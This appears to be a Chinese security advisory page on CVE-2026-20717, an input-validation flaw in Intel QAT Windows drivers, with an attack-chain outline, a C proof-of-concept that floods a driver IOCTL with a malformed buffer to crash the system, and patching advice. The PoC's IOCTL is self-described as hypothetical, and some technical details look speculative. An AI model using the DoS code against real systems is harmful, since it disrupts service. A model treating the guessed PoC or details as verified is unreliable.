CVE-2026-20717 CVSS 6.6 中危

CVE-2026-20717 Intel QAT驱动输入验证不当漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-20717

漏洞类型

输入验证不当

CVSS评分

6.6 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Intel(R) QAT Software Drivers for Windows

漏洞概述

CVE-2026-20717是Intel QAT Windows驱动程序中的一个安全漏洞。在1.13版本之前，Ring 3用户应用程序未能正确验证用户输入。本地经过身份验证的低权限攻击者可利用此缺陷，无需用户交互即可发起低复杂度攻击。成功利用可能导致系统拒绝服务，进而对系统的机密性、完整性和可用性造成不同程度的影响，特别是对可用性影响较高。

技术细节

该漏洞位于Intel QAT软件驱动程序的Ring 3用户应用程序接口层。由于软件开发过程中未对来自用户态的输入参数实施充分的边界检查和格式验证，导致存在逻辑缺陷。具体而言，攻击者可以通过本地系统调用，向驱动程序传递特制的恶意数据包。这些数据包可能包含超长字符串、非法字符或异常的内存指针。由于驱动程序在处理这些请求前未进行完整性校验，触发了异常处理流程或内存访问错误。虽然攻击需要本地访问权限和低权限账户，但无需用户交互即可触发。一旦攻击成功，将导致驱动程序崩溃或系统死锁，造成拒绝服务。此外，由于内存状态的不可预测性，极少数情况下可能导致信息泄露或数据损坏，符合CVSS向量中C:L/I:L/A:H的描述。

攻击链分析

STEP 1

获取访问权限

攻击者获取目标系统的本地低权限用户账户。

STEP 2

构造恶意数据

攻击者编写程序，构造包含畸形输入的数据包，旨在绕过基本的输入检查。

STEP 3

发送攻击载荷

通过Ring 3用户应用程序接口，将恶意数据发送给Intel QAT驱动程序。

STEP 4

触发漏洞

驱动程序处理畸形输入时发生验证错误，导致异常或崩溃。

STEP 5

达成拒绝服务

系统驱动崩溃或死锁，导致可用性受损，服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <windows.h>
#include <stdio.h>

// Hypothetical IOCTL for Intel QAT driver
#define IOCTL_QAT_VULNERABLE_FUNC 0x80002000

int main() {
    HANDLE hDevice;
    DWORD bytesReturned;
    char maliciousBuffer[1024];

    // Fill buffer with pattern 'A' to simulate improper input
    memset(maliciousBuffer, 'A', sizeof(maliciousBuffer));

    // Open handle to the vulnerable device
    hDevice = CreateFile("\\\\.\\IntelQATDevice", 
                         GENERIC_READ | GENERIC_WRITE, 
                         0, 
                         NULL, 
                         OPEN_EXISTING, 
                         FILE_ATTRIBUTE_NORMAL, 
                         NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Failed to open device. Error: %d\n", GetLastError());
        return 1;
    }

    printf("Sending malicious payload to trigger DoS...\n");

    // Send the malformed input to the driver
    if (!DeviceIoControl(hDevice, 
                         IOCTL_QAT_VULNERABLE_FUNC, 
                         maliciousBuffer, 
                         sizeof(maliciousBuffer), 
                         NULL, 
                         0, 
                         &bytesReturned, 
                         NULL)) {
        printf("DeviceIoControl failed. Error: %d\n", GetLastError());
    } else {
        printf("Payload sent successfully. System may become unstable.\n");
    }

    CloseHandle(hDevice);
    return 0;
}

影响范围

Intel(R) QAT Software Drivers for Windows < 1.13

防御指南

临时缓解措施

建议立即应用官方发布的安全补丁，将驱动程序更新至1.13或更高版本。在未更新前，应严格限制本地用户权限，仅允许受信任的用户访问相关应用程序，并密切监控系统日志中的异常行为，以减少潜在攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表